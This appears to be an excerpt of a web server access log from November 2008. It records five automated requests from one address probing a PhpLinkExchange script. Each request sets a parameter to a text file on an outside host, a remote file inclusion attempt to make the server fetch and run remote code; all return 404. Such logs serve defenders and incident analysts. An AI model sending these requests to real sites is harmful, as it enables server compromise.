70.85.198.234 - - [29/Nov/2008:10:48:34 -0800] "GET /logs/access_080506.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:48:34 -0800] "GET /PhpLinkExchange/bits_listings.php?svr_rootP=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:48:34 -0800] "GET /PhpLinkExchange/bits_listings.php?svr_rootP=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:48:34 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.198.234 - - [29/Nov/2008:10:48:35 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
